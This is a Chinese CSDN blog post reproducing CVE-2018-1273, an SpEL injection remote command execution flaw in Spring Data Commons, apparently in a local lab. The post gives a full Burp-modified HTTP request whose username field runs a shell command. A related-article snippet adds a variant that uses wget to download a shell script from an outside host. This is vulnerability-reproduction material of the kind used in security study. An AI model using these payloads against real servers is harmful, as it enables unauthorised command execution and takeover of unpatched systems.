Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

最新推荐文章于 2024-07-25 11:59:12 发布
最新推荐文章于 2024-07-25 11:59:12 发布
阅读量49 收藏
点赞数 1
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liangjiao_shou/article/details/140662936
版权

Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

bp进行抓包,然后进行修改

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
liangjiao_shou
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Spring Data Commons 远程命令执行漏洞CVE-2018-1273)复现
klcyl_0106的博客
05-25 420
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
vulhub复现之spring Data Commons远程命令执行漏洞(CVE-2018-1273)漏洞复现
m0_70483044的博客
07-16 548
看到这个还是先了解一下什么是springDataCommons
Spring Data Commons 远程命令执行CVE-2018-1273)复现避坑
weixin_43749591的博客
11-02 292
漏洞简介: Spring Data 是一个简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data 下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞。 影响版本: Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) Spring Data Co
vulhub-Spring Data Commons 远程命令执行CVE-2018-1273)复现
weixin_63580357的博客
11-02 128
Spring Data 是一个简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data 下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273)
weixin_41438728的博客
12-02 1432
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273)漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞复现 漏洞修复 ...
Spring Data Commons 远程命令执行漏洞CVE-2018-1273)漏洞验证与getshell
qq_45300786的博客
08-02 1103
利用条件 影响版本 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) · Spring Data Commons 2.0 to 2.0.5 (Kay SR5) · Spring Data REST 3.0 - 3.0.5 (Kay SR5) 复现过程 vulhub 详细过程请看Spring Data Commons 远程命令执行漏洞CVE-2018-1273)
Spring Data Commons 远程命令执行漏洞CVE-2018-1273)——漏洞复现
weixin_42090431的博客
11-28 184
稍等一会,环境启动后,访问`http://your-ip:8080/users`,将可以看到一个用户注册页面。
Spring Data Commons远程命令执行(CVE-2018-1273)
Lucky1youzi的博客
01-02 269
渗透
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 808
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送jar包:spring-data-commons-2.0.6.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.6.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送jar包:spring-data-commons-2.5.5.jar; 赠送原API文档:spring-data-commons-2.5.5-javadoc.jar; 赠送源代码:spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5....
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送jar包:spring-data-commons-2.3.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.3.9.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
Vue 3 和 SpringBoot 实现文件分片上传示例
exlink2012的专栏
07-22 458
实现分片上传,并使用Spring Boot在后端保存文件。前端将文件分片并逐个上传到后端,后端接收到所有分片后再进行合并,最终保存为一个完整文件。
SpringMVC 控制层框架-
woai3364的博客
07-20 1107
因此,在开发过程中,合理处理异常、避免异常产生、以及对异常进行有效的调试是非常重要的。如果张三负责的模块按照 A 方案处理异常,李四负责的模块按照 B 方案处理异常...各个模块处理异常的思路、代码、命名细节都不一样,那么就会让整个项目非常混乱。在Web 应用三层架构体系中,表述层负责接收浏览器提交的数据,业务逻辑层负责数据的处理。一个网站有 5、6个资源,其中有一个为登录资源,两个无需登录即可访问,另外三个需要登录后才能访问,如果不登录就访问那三个资源,需要拦截,并且提示登录后访问。
SpringBoot添加密码安全配置以及Jwt配置
最新发布
qq_64468032的博客
07-25 712
然后修改之前的SecurityConfig配置类,里面的configure方法里面的.antMatchers里面追加的url是不需要验证就能进行使用的请求,比如登录注册等url请求的放开,需要的话可以一直追加。如果数据库中的密码没有加密,可以通过测试类将密码进行加密,然后用加密之后的字符串与数据库中的数据进行替换即可。通过以下操作可以直接从token中获取用户的信息,然后通过用户的信息进行验证并返回用户需要的信息。在没有配置的情况下,默认用户名为 user ,密码在控制台中查找(如下)。
SpringBoot启动命令过长
tiantiantbtb的博客
07-24 263
Error running 'DromaraApplication': Command line is too long. Shorten command line for DromaraApplication or also for Spring Boot default configuration?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值